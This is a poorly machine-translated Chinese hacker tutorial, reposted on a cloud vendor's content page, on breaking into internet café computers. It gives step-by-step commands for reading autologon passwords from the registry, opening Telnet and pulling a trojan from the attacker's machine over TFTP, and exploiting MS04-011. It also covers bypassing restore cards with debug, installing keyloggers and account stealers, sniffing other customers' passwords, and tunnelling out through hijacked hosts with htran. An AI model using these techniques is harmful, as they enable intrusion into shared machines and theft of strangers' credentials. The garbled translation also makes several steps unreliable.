Internet café intrusion of the Gongwubuke! _ Vulnerability Research

Source: Internet
Author: User
Tags pack email account dns spoofing
Author: Hacker.a ... Article Source: hacker.ab8.cn
Often look at the x file, found about cracking Pubwin and Vientiane more than the article, today I decided to write some Internet cafes intrusion article, I hope to some side dishes help.
A. Internet café intrusion
There are many ways to invade, but what is the most common method of intrusion on internet cafes? First, automatic landing. Now internet cafes are generally win2000 or Windows XP machines, network management generally set the machine for automatic landing! So we boot into the system when the landing window flashed! At the time if we findfass.exe try to find out the login password is not successful! Because the account password is not in memory at all, and findfass.exe through the Winlogon PID number and the correct domain name, in the memory to look for a good section of the memory block (save the encrypted login password), and then decrypt it, so that the plaintext password. In fact, the automatic login account password is in the registry. We open the registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Nt\currentversion\winlogon\ This directory, AutoAdminLogon the key value of this item is 1, Indicates an automatic login. For 1, open the user and password on the control Panel, and you will find that the hook in front of the password has been removed. DefaultUserName the corresponding key value is the login username, DefaultPassword corresponding key value is the login password. In fact, the sea top Trojan 2006 has a function, the principle is the same, but because the issue of authority, not necessarily read out. In this way, we all found the password account. And you know, an Internet café automatic landing password account is generally the same, and network management in order to facilitate the Internet worm network generally set them in the Administrator group, at least the user group. Do you know the password account is still worried about invasion? Internet Café Server services are generally disabled, then we can not use IPC intrusion. Opentelnet.exe We also can not use, because of a also rely on IPC connection, Dameware remote control is not good, the same reason. We can use Recton with a small practical tool to open Telnet, the tool is particularly good under the Win2000.
As shown in Figure 1.
After Telnet, we telnet up, first open tftpd32.exe on the machine, then telnet below telnet-i Myip get 3721.exe C:\3721.exe, This is our Trojan 3721.exe such as Radmin passed.
Then run the 3721.exe directly under Telnet and OK.
Another method is ms04011 loopholes, do not think that a loophole has been outdated, in the Internet café this loophole is quite common, many Internet cafes network management will only install games, reload system, do not pay attention to write loopholes, do not bother to play patches! We use Dsscan scan 192.168.0.1-192.168.0.255, usually you will be very pleasantly surprised. We went to overflow with the ms04011 overflow tool, and suddenly got the system privileges.
As shown in Figure 3.
There are a lot of intrusion methods, you can move the Xscan out to scan. A lot of rookie like to use AH D tool Pack to sweep the Internet bar empty password, in fact, this tool sweep user account password is very weak, I tried before, I used the first method to find that the Internet café has a password for the empty administrator account, with AH D toolkit only swept out a few machines have this account. I always use my favorites.
Lightning Fox--Firefox port scanner to sweep the Internet Café Host, the first server and so on. A scanner is fast, and scanning 1 to 10000 ports is not a few minutes away. If you find the server open 80 fracture, nature is to see whether the site is erected. Look at the site is very loopholes, to find ways to send an ASP Trojan up to enhance the rights. If you find that the movie server is Serv_u and you have an account, you can try the Serv_u overflow.
Two. Internet Café Shepherd Horse
Install in the Internet café the most important thing is to restore it broken, and now the restoration of Internet cafes generally have 3 kinds, that is, restore cards, restore elves, the freezing point of the Restoration Wizard. HDD Restore card In fact, the so-called hard disk protection card is written in ROM a section of Hook INT 13 program, shielding the
Some function calls such as ah=3,5, the seg,offset of INT 13 in the Interrupt vector table
Described as [13h*4+2],[13h*4], save the program in this first and replace it with your own code.
When you ah=2, it will call the original INT 13 address to complete (Shang Zhou).
Just find the original INT 13 entry and you can do whatever you want.
The specific process is as follows:
Boot process hold down the F8 key, into a pure DOS environment, note ";" After the comment.
There is a prompt C:,
Type C:\debug,
-A100
-XOR Ax,ax
-INT 13
-Int3
; Look for the original INT 13 inlet.
then enter T-carriage and repeat until the address shown is f000:xxxx
, the following instructions for: MOV dl,80 (Practice eyesight-. Press Q to exit.
Write down this address and fill it in at (0:13h*4) =0:4ch.
For example, the address I got was f000:9a95.
Run debug again, and type:
The role of-e 0:4c 9A F0 e the datasheet "9A F0" is written to the byte at the beginning of the address 0:4c.
-Q
Note: Fill the time to be careful, fill in the wrong words will panic. OK, crack complete.
At this point, type in the prompt c:\
C:\win
Enter the Windows system, so this time you have everything in the Windows system (Shang Zhou), with the next
Will be stored by the restore card.
This method is known to everyone, but the operation is also a bit dangerous, can not start. and Win2000 No DOS environment, in the end the sex is not? Oh, I haven't
Do this dangerous attempt. However, there are a lot of things about the recovery card can be downloaded tools, what is the best tool to make, everyone test their own.
As for the restore card, there is a password reader on the Web, but the tool can only be used under Win98. Under the Win2K we can use Winhex to crack, the second method is very effective,
Should be the best way. First casually lose the wrong password, pop-up error window does not move, with Winhex to find the main memory, find the Restore Wizard, and then search us to start
The wrong password for the loss. You should have the correct password next to the wrong password. We'll just have to type in the correct password dump. It's very simple here, no screenshots!
As for the freezing point reduction, it seems that there is no solution, this is indeed very powerful. But he has an option, that is, reboot how many times after not restore, nothing you can multiple Kai
Try it, don't break the machine.
After the restoration, the Trojan horse was installed. We'd better pack a keyboard record or password to intercept Trojan, steal QQ, game account, email account and so on. such as password stuttering tools, can also
Set the browser default home page to your Web Trojan. If the default home page of the Internet café is the same, and you have the ability to invade the site, on the default home page hanging horse that better!
Three. Internet cafes sniffing.
If you want to know the QQ number of a mm in an Internet café, you should use qqsniffer,ver2005build5.5. Xniffer can also be used to sniff the TCP/IP protocol password transmitted in the domain network or in the pop.smtp.ftp of the local computer. The format is Xsiff.exe-pass-hide-log pass.log xsiff.exe-tcp-udp-asc-addr 192.168.1.1. If you don't like it, there's a password listener, which is used to listen for the password on the Web page, including the mailboxes, forums, chat rooms, and so on. Just run on a single computer, you can listen to any computer on the LAN login account and password, and the password display, save, or sent to the user specified mailbox. I always have the code listener 2.4 cracked version in the Internet Café listening to others
Password! Of course, Internet cafes are most suitable for DNS spoofing!
As shown in Figure 3.
Four. Port forwarding.
In order to be able to control the Internet Café machine anytime, at home also can! We'd better make a port forwarding. First we can use Fport.exe (this tool in the angelshell1.0 package), the format is fport but use him can not install the back door, only need ordinary permissions to execute. The Internet Café Server is generally win2000server version, we take advantage of the administrator do not notice, give him open 3389. If his IP is 192.168.0.1, we will execute Fport.exe 3389 myip 9999 on his command line, where Myip can be one of our only public IP chickens. We again in the public network IP chicken running FportClient.exe is a client. We landed on the public network IP chicken 9999 ports into the Internet Café host. Watch the movie on the top to catch anything, not to be found on the line, we move a little light on the line. We can also install the agent to the Internet bar host. Just use Htran2.4,sockscap. Execute htran.exe-install on the Internet Bar Host command line (install SOCKS5 service), Htran.exe-start (Start SOCKS5 Service), then execute "htran.exe-s-connect common network Broiler IP 3389." Perform htran.exe-s-listen 3389 5200 (listening port) on your own common-network broiler. Now connect 218.3.1.1 5200 port with Sockscap, it is equal to enter the Internet Café host. We can also
With VIDC to map the port, this and fport almost do not say more.
Here to the end of this article, in fact, there is no advanced technology, Master laughed at. In fact, when the invasion will encounter a variety of problems, can solve these problems. is the essence of Master and rookie difference! Hope to like communication technology friends and I contact, my QQ is: 156544632. My station.
Turn
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.